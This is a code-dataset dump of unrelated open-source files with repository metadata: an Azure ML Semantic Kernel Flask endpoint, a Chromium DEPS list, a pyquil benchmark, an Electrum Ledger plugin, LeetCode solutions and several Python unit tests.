2670acdaad0515f6c6a13dbfbff6a59c8b062e01 | 500bca3e22bd0c30c79b74918e9847742b3c428e | /sdk/python/endpoints/online/llm/src/sk/app.py | 6c4efd2ff36aeba32c63d59cd924d39133854683 | [
"MIT"
] | permissive | Azure/azureml-examples | 2304c862fd2e36e6640ecc4d09f69c5ed93b48ab | e5f7b247d4753f115a8f7da30cbe25294f71f9d7 | refs/heads/main | 2023-08-31T00:10:14.107509 | 2023-08-30T17:29:22 | 2023-08-30T17:29:22 | 289,334,021 | 1,219 | 1,074 | MIT | 2023-09-14T16:00:55 | 2020-08-21T18:04:26 | Jupyter Notebook | UTF-8 | Python | false | false | 4,917 | py | from __future__ import annotations
import sys, os, json
from flask import Flask, request
import semantic_kernel as sk
import semantic_kernel.connectors.ai.open_ai as sk_oai
from semantic_kernel.planning.basic_planner import BasicPlanner
from semantic_kernel.planning.plan import Plan
from azure.identity import DefaultAzureCredential, AzureCliCredential
# add parent directory to path
sys.path.insert(0, str(os.path.abspath(os.path.join(os.path.dirname(__file__), "../"))))
import utils
openai_config: utils.OpenAIConfig = None
IS_CHAT_COMPLETION = None
import importlib
importlib.reload(utils)
# set to true for chat completion API, false for text completion
IS_CHAT_COMPLETION = True
credential = DefaultAzureCredential(additionally_allowed_tenants=["*"])
def init() -> tuple[sk.Kernel, BasicPlanner]:
    """Load secrets and env config, then build the (kernel, planner) pair
    used by the Flask endpoints below."""
    utils.load_secrets(credential)
    load_env_vars()
    kernel = create_kernel(debug=False)
    planner = BasicPlanner()
    return kernel, planner
def load_env_vars():
    """Refresh the module-level OpenAI settings from the environment."""
    global openai_config
    openai_config = utils.OpenAIConfig.from_env()
    global IS_CHAT_COMPLETION
    # NOTE(review): bool("") is False but bool("false") is True, so ANY
    # non-empty value enables chat completion — confirm intended semantics.
    IS_CHAT_COMPLETION = bool(os.environ.get("IS_CHAT_COMPLETION"))
def import_skills(kernel: sk.Kernel, skills_folder: str):
    """Register every skill directory found under *skills_folder* with *kernel*."""
    print(f"Importing skills from {skills_folder}")
    for entry in os.listdir(skills_folder):
        print(f"== Importing skill {entry}: {os.path.join(skills_folder, entry)}")
        kernel.import_semantic_skill_from_directory(skills_folder, entry)
def create_kernel(debug: bool = False) -> sk.Kernel:
    """Build a semantic-kernel instance wired to Azure OpenAI or OpenAI.

    The service kind is chosen by `openai_config.OPENAI_API_TYPE` and the
    chat-vs-text flavour by the module-level IS_CHAT_COMPLETION flag.
    Skills under the sibling `skills/` folder are imported before returning.
    """
    logger = sk.NullLogger()
    if debug:
        # Route DEBUG-level logging to stdout while debugging.
        import logging
        logger = logging.getLogger()
        logger.setLevel(logging.DEBUG)
        handler = logging.StreamHandler(sys.stdout)
        formatter = logging.Formatter(
            "%(asctime)s - %(name)s - %(levelname)s - %(message)s"
        )
        handler.setFormatter(formatter)
        logger.handlers.clear()
        logger.addHandler(handler)
    # NOTE(review): `logger` is configured above but never handed to the
    # kernel or the services below — confirm whether it should be passed.
    kernel = sk.Kernel()
    if openai_config.OPENAI_API_TYPE == "azure":
        # if using chat service from Azure OpenAI API, use AzureChatCompletion
        kernel.add_text_completion_service(
            "completion",
            sk_oai.AzureChatCompletion(
                deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
                api_key=openai_config.OPENAI_API_KEY,
                endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
            )
            if IS_CHAT_COMPLETION
            else sk_oai.AzureTextCompletion(
                deployment_name=openai_config.AZURE_OPENAI_API_DEPLOYMENT_NAME,
                api_key=openai_config.OPENAI_API_KEY,
                endpoint=openai_config.AZURE_OPENAI_API_ENDPOINT,
            ),
        )
    else:
        print(
            "using openai", openai_config.OPENAI_MODEL_ID, openai_config.OPENAI_ORG_ID
        )
        kernel.add_text_completion_service(
            "completion",
            sk_oai.OpenAIChatCompletion(
                openai_config.OPENAI_MODEL_ID,
                openai_config.OPENAI_API_KEY,
                openai_config.OPENAI_ORG_ID,
            )
            if IS_CHAT_COMPLETION
            else sk_oai.OpenAITextCompletion(
                openai_config.OPENAI_MODEL_ID,
                openai_config.OPENAI_API_KEY,
                openai_config.OPENAI_ORG_ID,
            ),
        )
    # import skills from skills folder
    import_skills(
        kernel, os.path.join(os.path.dirname(os.path.realpath(__file__)), "skills")
    )
    return kernel
kernel, planner = init()
async def invoke_skill(skillName, functionName, context):
    """Resolve the (skill, function) pair on the kernel and invoke it with *context*."""
    skillFunction = kernel.func(skillName, functionName)
    return await skillFunction.invoke_async(context=context)
# class for plan deserializing
class GeneratedPlan:
    """Deserialization shim: carries a plan's JSON text under ``.result`` so a
    Plan can be rebuilt from a request body (see the /planner/executeplan route)."""
    def __init__(self, result: str):
        self.result = result
app = Flask(__name__)
@app.route("/", methods=["GET"])
def home():
    """Liveness probe for the root path."""
    return "ok"
@app.route("/health", methods=["GET"])
def health():
    """Health-check endpoint."""
    return "healthy"
@app.route("/skills/<skillName>/invoke/<functionName>", methods=["POST"])
async def invoke(skillName, functionName):
    """Invoke a named skill function with the JSON request body as context."""
    return await invoke_skill(skillName, functionName, request.get_json())
@app.route("/planner/createplan", methods=["POST"])
async def createplan():
    """Create a plan for the goal supplied under the 'value' key."""
    body = request.get_json()
    goal = body["value"]
    plan = await planner.create_plan_async(goal, kernel)
    print(plan.generated_plan.result)
    return plan.generated_plan.result
@app.route("/planner/executeplan", methods=["POST"])
async def executeplan():
    """Execute a previously generated plan posted back as JSON."""
    body = request.get_json()
    print(body)
    # Re-wrap the JSON body so Plan/planner see the shape they expect.
    gp = GeneratedPlan(result=json.dumps(body))
    p = Plan(goal=None, prompt=None, plan=gp)
    result = await planner.execute_plan_async(p, kernel)
    print(result)
    return result
if __name__ == "__main__":
    # Development entry point; binds on all interfaces.
    app.run(host="0.0.0.0", port=5001)
| [
"noreply@github.com"
] | Azure.noreply@github.com |
66494b274cf67dfca2dac51e878dee4bf7d43575 | c8e6cf760a78ec45dbc2d3b6452e352d12da1f43 | /components/unified_consent/DEPS | 42423010fe2e8b1d84ae25a6998fb403a18a2558 | [
"BSD-3-Clause"
] | permissive | tojoyccnu/chromium | 15479d1d9e8159d5eecd61571d33effa78e573b7 | 8cba72403a712767289acb2c7cd06d1116db42cc | refs/heads/master | 2023-03-04T11:55:25.131615 | 2018-06-26T13:34:07 | 2018-06-26T13:34:07 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 240 | include_rules = [
"+components/autofill/core/common",
"+components/browser_sync",
"+components/keyed_service/core",
"+components/pref_registry",
"+components/prefs",
"+components/sync/base",
"+services/identity/public/cpp",
]
| [
"commit-bot@chromium.org"
] | commit-bot@chromium.org | |
4bfcfba3cd42fe4b8758370453ea882fa441832f | 09e57dd1374713f06b70d7b37a580130d9bbab0d | /data/p4VQE/R3/benchmark/startPyquil724.py | ea617cb370afcd2e188b6722dbf150be0426ed29 | [
"BSD-3-Clause"
] | permissive | UCLA-SEAL/QDiff | ad53650034897abb5941e74539e3aee8edb600ab | d968cbc47fe926b7f88b4adf10490f1edd6f8819 | refs/heads/main | 2023-08-05T04:52:24.961998 | 2021-09-19T02:56:16 | 2021-09-19T02:56:16 | 405,159,939 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,254 | py | # qubit number=4
# total number=15
import pyquil
from pyquil.api import local_forest_runtime, QVMConnection
from pyquil import Program, get_qc
from pyquil.gates import *
import numpy as np
conn = QVMConnection()
def make_circuit()-> Program:
    """Build the fixed 4-qubit benchmark circuit; each gate's sequence index
    is recorded in the trailing `# number=` comments."""
    prog = Program() # circuit begin
    prog += H(0) # number=1
    prog += H(1) # number=2
    prog += H(2) # number=3
    prog += CNOT(0,2) # number=12
    prog += X(2) # number=13
    prog += CNOT(0,2) # number=14
    prog += Y(3) # number=5
    prog += SWAP(1,0) # number=7
    prog += H(1) # number=11
    prog += SWAP(1,0) # number=8
    prog += Y(0) # number=9
    prog += Y(0) # number=10
    # circuit end
    return prog
def summrise_results(bitstrings) -> dict:
    """Tally how many times each measured bitstring occurs."""
    counts = {}
    for bits in bitstrings:
        counts[bits] = counts.get(bits, 0) + 1
    return counts
if __name__ == '__main__':
    # Sample the circuit 1024 times on a 4-qubit QVM, join the per-qubit
    # samples into bitstrings, and write the tally to ../data/.
    prog = make_circuit()
    qvm = get_qc('4q-qvm')
    results = qvm.run_and_measure(prog,1024)
    bitstrings = np.vstack([results[i] for i in qvm.qubits()]).T
    bitstrings = [''.join(map(str, l)) for l in bitstrings]
    writefile = open("../data/startPyquil724.csv","w")
    print(summrise_results(bitstrings),file=writefile)
    writefile.close()
| [
"wangjiyuan123@yeah.net"
] | wangjiyuan123@yeah.net |
fe019310e5d9258fe9c864c492fea1db00791b9c | c9dc1ddbcf752318ab5ee42bc997493fbe6c6689 | /electrum_mue/plugins/ledger/cmdline.py | 5c7be960031d3f307d6ba4ea81368a298583e087 | [
"MIT"
] | permissive | Hser2bio/electrum-mue | 7ea770bda0ddfbf81bdda6627e4be2745700ec00 | 5369056b54e862826b6c3132d15ecd3a3d6b6bc0 | refs/heads/master | 2020-12-10T15:13:15.878787 | 2020-01-13T15:37:30 | 2020-01-13T15:37:30 | 233,629,634 | 0 | 0 | MIT | 2020-01-13T15:36:34 | 2020-01-13T15:36:33 | null | UTF-8 | Python | false | false | 402 | py | from electrum_mue.plugin import hook
from .ledger import LedgerPlugin
from ..hw_wallet import CmdLineHandler
class Plugin(LedgerPlugin):
    """Ledger hardware-wallet plugin for the CLI: every keystore/window
    shares a single CmdLineHandler instead of per-window handlers."""
    handler = CmdLineHandler()
    @hook
    def init_keystore(self, keystore):
        # Only attach the shared handler to keystores of this plugin's type.
        if not isinstance(keystore, self.keystore_class):
            return
        keystore.handler = self.handler
    def create_handler(self, window):
        # The CLI has no windows; always reuse the shared handler.
        return self.handler
| [
"sotblad@monetaryunit.org"
] | sotblad@monetaryunit.org |
1db9f9e97f277b0a457c123937a3ea8789882f42 | 30258c8e9c35a21fa3ef13c68dfddd23c56568d6 | /interview_bit/arrays/anti_diagnolas.py | fdf867d0fdc3c9ea09ddccd923fa617706d4387d | [] | no_license | venkatachiranjeevi/algorithms | 3e6d525be36ee34f969d49959df1aaad35fcb1d5 | 83724f647102acba00dd028a81e09888ce980785 | refs/heads/master | 2021-06-11T05:23:57.080523 | 2020-04-14T05:16:20 | 2020-04-14T05:16:20 | 128,548,617 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 440 | py | __author__ = 'venkat'
class Solution:
    def diagonal(self, a):
        """Return the anti-diagonals of square matrix *a*, from the top-left
        corner to the bottom-right; inputs smaller than 2x2 are returned
        unchanged."""
        n = len(a)
        if n < 2:
            return a
        diagonals = []
        # Anti-diagonal s collects every a[row][col] with row + col == s.
        for s in range(2 * n - 1):
            diagonals.append([a[row][s - row]
                              for row in range(s + 1)
                              if row < n and s - row < n])
        return diagonals
# a = [[1,2,3],[4,5,6],[7,8,9]]
a = [[1,2],[3,4]]
print Solution().diagonal(a) | [
"chiranjeevi.kokku@tjnovandi.com"
] | chiranjeevi.kokku@tjnovandi.com |
f4cd19786978a0c6c8debd52439fa372b7109bce | a8750439f200e4efc11715df797489f30e9828c6 | /LeetCodeContests/53/53_691.py | 511d5fe0c21fd406c29fae78a7dd7384e353ebbe | [] | no_license | rajlath/rkl_codes | f657174305dc85c3fa07a6fff1c7c31cfe6e2f89 | d4bcee3df2f501349feed7a26ef9828573aff873 | refs/heads/master | 2023-02-21T10:16:35.800612 | 2021-01-27T11:43:34 | 2021-01-27T11:43:34 | 110,989,354 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,441 | py | '''
691. Stickers to Spell Word
User Accepted: 81
User Tried: 374
Total Accepted: 86
Total Submissions: 948
Difficulty: Hard
We are given N different types of stickers. Each sticker has a lowercase English word on it.
You would like to spell out the given target string by cutting individual letters from your collection of stickers and
rearranging them.
You can use each sticker more than once if you want, and you have infinite quantities of each sticker.
What is the minimum number of stickers that you need to spell out the target? If the task is impossible, return -1.
Example 1:
Input:
["with", "example", "science"], "thehat"
Output:
3
Explanation:
We can use 2 "with" stickers, and 1 "example" sticker.
After cutting and rearrange the letters of those stickers, we can form the target "thehat".
Also, this is the minimum number of stickers necessary to form the target string.
Example 2:
Input:
["notice", "possible"], "basicbasic"
Output:
-1
Explanation:
We can't form the target "basicbasic" from cutting letters from the given stickers.
Note:
stickers has length in the range [1, 50].
stickers consists of lowercase English words (without apostrophes).
target has length in the range [1, 15], and consists of lowercase English letters.
In all test cases, all words were chosen randomly from the 1000 most common US English words, and the target was chosen as a concatenation of two random words.
The time limit may be more challenging than usual. It is expected that a 50 sticker test case can be solved within 35ms on average.
'''
class Solution:
    def minStickers(self, stickers, target):
        """
        :type stickers: List[str]
        :type target: str
        :rtype: int

        Bitmask DP: dp[mask] is the fewest stickers covering exactly the
        target positions set in `mask`; the answer is dp over the full mask,
        or -1 when some letter of `target` appears in no sticker.

        Fixes vs. the original: dp must start at -1 (unreached sentinel),
        not 0, and the bit tests/sets must use `&`/`|` rather than the
        boolean `and`/`or` operators; dp is also sized to 1 << len(target)
        instead of a fixed 1 << 15.
        """
        n = len(target)
        full = 1 << n
        dp = [-1] * full
        dp[0] = 0
        for mask in range(full):
            if dp[mask] == -1:
                continue  # state not reachable with any sticker combination
            for sticker in stickers:
                cur = mask
                # Apply the sticker greedily: each of its letters covers the
                # first still-uncovered matching position of `target`.
                for ch in sticker:
                    for r in range(n):
                        if (cur >> r) & 1:
                            continue  # position r already covered
                        if target[r] == ch:
                            cur |= 1 << r
                            break
                if dp[cur] == -1 or dp[cur] > dp[mask] + 1:
                    dp[cur] = dp[mask] + 1
        return dp[full - 1]
sol = Solution()
print(sol.minStickers(["with", "example", "science"], "thehat"))
| [
"raj.lath@gmail.com"
] | raj.lath@gmail.com |
a12029068bf685dcc7c11d2d1ccc4063dd8dbc54 | c9ddbdb5678ba6e1c5c7e64adf2802ca16df778c | /cases/pa3/sample/object_attr_get-108.py | e8818fd053b17f5f19744393b5a5a6900ba499ca | [] | no_license | Virtlink/ccbench-chocopy | c3f7f6af6349aff6503196f727ef89f210a1eac8 | c7efae43bf32696ee2b2ee781bdfe4f7730dec3f | refs/heads/main | 2023-04-07T15:07:12.464038 | 2022-02-03T15:42:39 | 2022-02-03T15:42:39 | 451,969,776 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 182 | py | class A(object):
a:int = 42
class B(A):
b:bool = True
def __init__(self:"B"):
print("B")
a:A = None
b:B = None
a = b = B()
print(a.a)
print(b.$ID)
print(b.b)
| [
"647530+Virtlink@users.noreply.github.com"
] | 647530+Virtlink@users.noreply.github.com |
f1c575c097cde921b3ca5577df204d7ee4135b08 | 1d9e681b204e6ec2d7a710ef45b7dec082239491 | /venv/Lib/site-packages/test/test_leagues_api.py | 48ffc4664efcaf97941442d25c9aa298f62759cf | [] | no_license | 1chimaruGin/DotaAnalysis | 0e0b85805cc83e4cc491d46f7eadc014e8d6b1f1 | 6a74cde2ee400fc0dc96305203d60c5e56d7ecff | refs/heads/master | 2020-07-21T20:48:07.589295 | 2019-09-07T12:20:15 | 2019-09-07T12:20:15 | 206,972,180 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,134 | py | # coding: utf-8
"""
OpenDota API
# Introduction The OpenDota API provides Dota 2 related data including advanced match data extracted from match replays. Please keep request rate to approximately 1/s. **Begining 4/22/2018, the OpenDota API will be limited to 50,000 free calls per month.** We'll be offering a Premium Tier with unlimited API calls and higher rate limits. Check out the [API page](https://www.opendota.com/api-keys) to learn more.
OpenAPI spec version: 17.6.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import os
import sys
import unittest
import od_python
from od_python.rest import ApiException
from od_python.apis.leagues_api import LeaguesApi
class TestLeaguesApi(unittest.TestCase):
    """ LeaguesApi unit test stubs """
    def setUp(self):
        # Fresh API client per test.
        self.api = od_python.apis.leagues_api.LeaguesApi()
    def tearDown(self):
        # No per-test cleanup required yet.
        pass
    def test_leagues_get(self):
        """
        Test case for leagues_get

        GET /leagues
        """
        # TODO: exercise self.api.leagues_get() once fixtures exist.
        pass
if __name__ == '__main__':
unittest.main()
| [
"kyitharhein18@gmail.com"
] | kyitharhein18@gmail.com |
ab36dc2d10fb2e290cb55a1c9d512d4acefab8f7 | e7795082c0131682803a09e929a86b2deddeab74 | /common/decorators.py | a2daa4aba896ef449a232fc88e7972e82d3bc2f0 | [
"MIT"
] | permissive | liwanlei/FXTest | 01de3ad55849b16c49d93b58d1aae21fd0fdafa0 | aeda58d01c14194290ca149d411c3a8596cca82d | refs/heads/master | 2023-04-01T15:45:26.668688 | 2023-03-19T05:19:54 | 2023-03-19T05:19:54 | 97,098,845 | 807 | 419 | MIT | 2022-04-23T06:52:16 | 2017-07-13T08:27:48 | Python | UTF-8 | Python | false | false | 342 | py | # -*- coding: utf-8 -*-
# @Date : 2017-08-14 20:58:13
# @Author : lileilei
'''
判断是否是管理员
'''
from flask_login import current_user
def chckuserpermisson():
    """Return True when the current user is an administrator.

    A user qualifies if the super-user flag is set, or if ANY of their
    assigned roles has rose == 2.

    Fixes vs. the original: the loop returned inside its else branch, so only
    the first role was ever inspected; a user with no roles returned None and
    the super-user flag was never even checked for them.
    """
    # Super users are always administrators, even with no roles assigned.
    if current_user.is_sper == 1:
        return True
    return any(int(rosse.rose) == 2 for rosse in current_user.quanxians)
| [
"leileili126@163.com"
] | leileili126@163.com |
7a4ea1e22297182f60b7f8fb6604fa106b46ffca | 9c5abcd43318ef7553be95a95a859a0f3e41a467 | /easygraphics/_utils/invoke_in_app_thread.py | 14b67c2f87247464ac457fbf9367817f2f21572d | [
"BSD-3-Clause"
] | permissive | xzy103/PyEasyGraphics | d66da503f601868fe39d404a77b3b8d0a43a2e52 | 16bd6f21dd6f3d76edaab2b533500e9aa789c6b2 | refs/heads/master | 2020-05-19T07:31:22.005958 | 2019-02-25T09:54:41 | 2019-02-25T09:54:41 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,138 | py | #####################################################################
# #
# invoke_in_main.py #
# #
# Copyright 2013, Christopher Billington, Philip Starkey #
# #
# This file is part of the qtutils project #
# (see https://bitbucket.org/philipstarkey/qtutils ) #
# and is licensed under the 2-clause, or 3-clause, BSD License. #
# See the license.txt file in the root of the project #
# for the full license. #
#
# #
#####################################################################
import functools
# tailored and modified by roy
import sys
import threading
import time
from queue import Queue
from PyQt5 import QtWidgets
from PyQt5.QtCore import QEvent, QObject, QCoreApplication
def _reraise(exc_info):
    # Re-raise a (type, value, traceback) triple from sys.exc_info(),
    # preserving the original traceback for the caller.
    exc_type, value, traceback = exc_info
    raise value.with_traceback(traceback)
class CallEvent(QEvent):
    """An event containing a request for a function call."""
    # Custom Qt event type shared by every CallEvent instance.
    # NOTE(review): registerEventType() returns an int; wrapping it in
    # QEvent(...) and passing that object as the type below relies on PyQt's
    # implicit conversion — confirm against qtutils upstream, which uses
    # QEvent.Type(...) here.
    EVENT_TYPE = QEvent(QEvent.registerEventType())
    def __init__(self, queue, exceptions_in_main, fn, *args, **kwargs):
        # `queue` receives [result, exception] once the call has executed.
        QEvent.__init__(self, self.EVENT_TYPE)
        self.fn = fn
        self.args = args
        self.kwargs = kwargs
        self._returnval = queue
        # Whether to raise exceptions in the main thread or store them
        # for raising in the calling thread:
        self._exceptions_in_main = exceptions_in_main
class Caller(QObject):
    """An event handler which calls the function held within a CallEvent."""
    def event(self, event):
        # Executed in the receiver (Qt) thread for each posted CallEvent.
        event.accept()
        exception = None
        try:
            result = event.fn(*event.args, **event.kwargs)
        except Exception:
            # Store for re-raising the exception in the calling thread:
            exception = sys.exc_info()
            result = None
            if not event._exceptions_in_main:
                raise
        finally:
            # Always hand [result, exception] back to the waiting caller,
            # even when the exception is re-raised above.
            event._returnval.put([result, exception])
        return True
_caller = None
def init_invoke_in_app():
    """Create the module-level Caller and clear the shutdown flag.

    Fix vs. the original: `_wait_for_quit` was assigned without a `global`
    declaration, making the reset a dead local store — once wait_for_quit()
    had been called, the flag could never be cleared again.
    """
    global _caller, _wait_for_quit
    _caller = Caller()
    _wait_for_quit = False
def destroy_invoke_in_app():
    # Reset module state so a fresh app/Caller pair can be created later.
    global _caller, _wait_for_quit
    _caller = None
    _wait_for_quit = False
def _start_app_thread():
    # Create the QApplication, apply the module-wide pixel font size, and
    # prevent an implicit quit when the last window closes.
    app = QtWidgets.QApplication([])
    font = app.font()
    font.setPixelSize(_font_size)
    app.setFont(font)
    app.setQuitOnLastWindowClosed(False)
    init_invoke_in_app()
    # init finished, can draw now
    return app
_wait_for_quit = False
def wait_for_quit():
    # Mark the app as shutting down; subsequent invoke_in_app_thread() calls
    # become no-ops that return None.
    global _wait_for_quit
    _wait_for_quit = True
_app_lock = threading.Lock()
def invoke_in_app_thread(fn, *args, **kwargs):
    """Run ``fn(*args, **kwargs)`` under the Qt application and return its result.

    Three cases, serialized by a module-level lock:

    * no app yet (`_caller is None`): create a temporary QApplication, call
      *fn* directly, then tear the app down — exceptions are re-raised only
      after cleanup;
    * app shutting down (`wait_for_quit()` was called): do nothing, return
      None;
    * app running: post the call to the Qt event loop via
      `_in_app_thread_later` and block for its result (exceptions raised by
      *fn* are re-raised in this thread).
    """
    _app_lock.acquire()   # serialize app/_caller lifecycle transitions
    try:
        if _caller is None:
            app = _start_app_thread()
            ex = None
            try:
                result = fn(*args, **kwargs)
            except Exception as e:
                ex = e
            # Tear down even on failure, then surface the exception.
            destroy_invoke_in_app()
            app.quit()
            app = None
            if ex is not None:
                raise ex
            return result
        elif _wait_for_quit:  # the app is quitting; don't show the dialog
            return None
        result = get_in_app_thread_result(_in_app_thread_later(fn, True, *args, **kwargs))
        return result
    finally:
        _app_lock.release()
def _in_app_thread_later(fn, exceptions_in_main, *args, **kwargs):
    """Post a request to call *fn* on the Qt event loop and return immediately.

    Returns the Queue that will eventually receive [result, exception]
    (exception is a sys.exc_info() triple, or None on success). Calls are
    executed in the order they were posted.
    """
    queue = Queue()
    QCoreApplication.postEvent(_caller, CallEvent(queue, exceptions_in_main, fn, *args, **kwargs))
    return queue
def get_in_app_thread_result(queue):
    """Block on *queue* (as produced by `_in_app_thread_later`) until the
    posted call finishes.

    Returns the function's result, or re-raises — in the calling thread —
    any exception the function raised while executing in the app thread.
    """
    outcome, error = queue.get()
    if error is not None:
        _reraise(error)
    return outcome
_font_size = 18
def set_app_font(size: int):
    # Pixel size applied to the QApplication font the next time
    # _start_app_thread() creates an app.
    global _font_size
    _font_size = size
def invoke_in_thread():
    """Decorator factory: make the decorated function always run in the Qt
    application thread.

    The wrapper blocks until the call completes in the app thread and
    returns its result; exceptions are re-raised in the calling thread.
    """
    def wrap(fn):
        """A decorator which sets any function to always run in the main thread."""
        @functools.wraps(fn)
        def f(*args, **kwargs):
            return invoke_in_app_thread(fn, *args, **kwargs)
        return f
    return wrap
| [
"royqh1979@gmail.com"
] | royqh1979@gmail.com |
d576ee243987e026e7db286752d55ddc344a1942 | 8cdad42543eb9d6a3c3a9ddf5a3d768a09aef78d | /lesson3/visual_optimizer/example_0.py | 1026e1151f0da929d1dfc302dc63cbde89018b05 | [] | no_license | SoulDuck/Edu_DL | b81b4ac871864440210b109c7fc76c7cc2c54391 | 3ab10fa147bb6282517a413a5c2c465f0277cebe | refs/heads/master | 2022-11-27T08:18:39.676980 | 2019-03-17T14:44:27 | 2019-03-17T14:44:27 | 155,827,188 | 0 | 1 | null | 2022-11-01T20:28:40 | 2018-11-02T07:04:08 | Jupyter Notebook | UTF-8 | Python | false | false | 2,289 | py | import matplotlib.pyplot as plt
import autograd.numpy as np
from mpl_toolkits.mplot3d import Axes3D
from matplotlib.colors import LogNorm
from matplotlib import animation
from IPython.display import HTML
from autograd import elementwise_grad, value_and_grad
from scipy.optimize import minimize
from collections import defaultdict
from itertools import zip_longest
from functools import partial
f = lambda x, y: (1.5 - x + x*y)**2 + (2.25 - x + x*y**2)**2 + (2.625 - x + x*y**3)**2
xmin, xmax, xstep = -4.5, 4.5, .2
ymin, ymax, ystep = -4.5, 4.5, .2
x, y = np.meshgrid(np.arange(xmin, xmax + xstep, xstep), np.arange(ymin, ymax + ystep, ystep))
z = f(x, y)
minima = np.array([3., .5]) # minima 인 곳을 별로 표시함
f(*minima) # minima value : 0
minima_ = minima.reshape(-1, 1)
fig = plt.figure(figsize=(8, 5))
ax = plt.axes(projection='3d', elev=50, azim=-50)
ax.plot(*minima_, f(*minima_), 'r*', markersize=10)
ax.plot_surface(x, y, z, norm=LogNorm(), rstride=1, cstride=1,
edgecolor='c', alpha=0.5, cmap=plt.cm.jet, linewidth=0.5)
ax.view_init(30, 10)
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
ax.set_zlabel('$z$')
ax.set_xlim((xmin, xmax))
ax.set_ylim((ymin, ymax))
plt.show()
plt.close()
# Optimizer
x0 = np.array([3., 4.])
func = value_and_grad(lambda args: f(*args))
def make_minimize_cb(path=None):
    """Build a scipy.optimize `callback` that records every iterate into *path*.

    Fix vs. the original: `path=[]` was a mutable default argument, so every
    no-argument call would share (and keep appending to) the same list.
    """
    if path is None:
        path = []
    def minimize_cb(xk):
        # note that we make a copy of xk, since the optimizer may reuse the
        # same array object between callbacks
        path.append(np.copy(xk))
    return minimize_cb
path_ = [x0]
res = minimize(func, x0=x0, method='Newton-CG',
jac=True, tol=1e-20, callback=make_minimize_cb(path_))
print(path_)
path_ = np.asarray(path_)
path = path_.T
fig = plt.figure(figsize=(8, 5))
ax = plt.axes(projection='3d', elev=50, azim=-50)
# logNorm -> Normalize a given value to the 0-1 range on a log scale
ax.plot_surface(x, y, z, norm=LogNorm(), rstride=2, cstride=2, edgecolor='none', alpha=0.5, cmap=plt.cm.jet)
ax.quiver(path[0,:-1], path[1,:-1], f(*path[::,:-1]),
path[0,1:] - path[0,:-1], path[1,1:] - path[1,:-1], f(*(path[::,1:] - path[::,:-1])),
color='k')
ax.plot(*minima_, f(*minima_), 'r*', markersize=10)
ax.set_xlabel('$x$')
ax.set_ylabel('$y$')
ax.set_zlabel('$z$')
ax.set_xlim((xmin, xmax))
ax.set_ylim((ymin, ymax))
plt.show()
plt.close()
| [
"plznw4me@naver.com"
] | plznw4me@naver.com |
26313529fa41479b7cac8f822e78c9ce13050b70 | a5b66100762c0ca7076de26645ef1b732e0ee2d8 | /test_python_toolbox/test_cute_iter_tools/test_iterate_overlapping_subsequences.py | acddca4ead74e7042a28fa22d1433a03de3ae3e3 | [
"MIT",
"BSD-3-Clause",
"Apache-2.0"
] | permissive | cool-RR/python_toolbox | 63400bbc004c63b32fe421b668a64bede4928e90 | cb9ef64b48f1d03275484d707dc5079b6701ad0c | refs/heads/master | 2022-01-26T14:41:29.194288 | 2021-12-25T06:49:40 | 2021-12-25T06:49:40 | 3,066,283 | 130 | 15 | NOASSERTION | 2021-12-25T06:49:41 | 2011-12-29T01:39:51 | Python | UTF-8 | Python | false | false | 5,491 | py | # Copyright 2009-2017 Ram Rachum.
# This program is distributed under the MIT license.
'''Testing module for `cute_iter_tools.iterate_overlapping_subsequences`.'''
import collections
from python_toolbox import gc_tools
from python_toolbox import nifty_collections
from python_toolbox import cute_testing
from python_toolbox import sequence_tools
from python_toolbox.cute_iter_tools import iterate_overlapping_subsequences
def test_length_2():
    """Default subsequence length (2): pairs, with and without wrap-around."""
    # `iterate_overlapping_subsequences` returns an iterator, not a sequence:
    assert not isinstance(
        iterate_overlapping_subsequences(list(range(4))),
        collections.abc.Sequence
    )
    assert tuple(iterate_overlapping_subsequences(list(range(4)))) == \
           tuple(iterate_overlapping_subsequences(range(4))) == \
           ((0, 1), (1, 2), (2, 3))
    # wrap_around adds the closing (last, first) pair:
    assert tuple(iterate_overlapping_subsequences(list(range(4)),
                                                  wrap_around=True)) == \
           tuple(iterate_overlapping_subsequences(range(4),
                                                  wrap_around=True)) ==\
           ((0, 1), (1, 2), (2, 3), (3, 0))
    assert tuple(iterate_overlapping_subsequences('meow')) == \
           (('m', 'e'), ('e', 'o'), ('o', 'w'))
def test_iterable_too_short():
    """wrap_around on a single-element iterable is explicitly unsupported."""
    with cute_testing.RaiseAssertor(NotImplementedError):
        tuple(iterate_overlapping_subsequences([1], wrap_around=True))
def test_various_lengths():
    """Explicit `length` values 1-5, with and without wrap-around.

    Note that length=1 yields bare items rather than 1-tuples.
    """
    assert tuple(iterate_overlapping_subsequences(range(7), length=3)) == \
        ((0, 1, 2), (1, 2, 3), (2, 3, 4), (3, 4, 5), (4, 5, 6))
    assert tuple(iterate_overlapping_subsequences(range(7), length=4)) == \
        ((0, 1, 2, 3), (1, 2, 3, 4), (2, 3, 4, 5), (3, 4, 5, 6))
    assert tuple(iterate_overlapping_subsequences(range(7), length=5)) == \
        ((0, 1, 2, 3, 4), (1, 2, 3, 4, 5), (2, 3, 4, 5, 6))
    assert tuple(iterate_overlapping_subsequences(range(7), length=1)) == \
        tuple(range(7))
    assert tuple(iterate_overlapping_subsequences(range(7), length=4,
        wrap_around=True)) == ((0, 1, 2, 3), (1, 2, 3, 4), (2, 3, 4, 5),
        (3, 4, 5, 6), (4, 5, 6, 0), (5, 6, 0, 1), (6, 0, 1, 2))
    assert tuple(iterate_overlapping_subsequences(range(7), length=5,
        wrap_around=True)) == ((0, 1, 2, 3, 4), (1, 2, 3, 4, 5),
        (2, 3, 4, 5, 6), (3, 4, 5, 6, 0), (4, 5, 6, 0, 1), (5, 6, 0, 1, 2),
        (6, 0, 1, 2, 3))
def test_lazy_tuple():
    """`lazy_tuple=True` wraps the result in a LazyTuple that collects lazily."""
    lazy_tuple = \
        iterate_overlapping_subsequences(range(7), length=3, lazy_tuple=True)
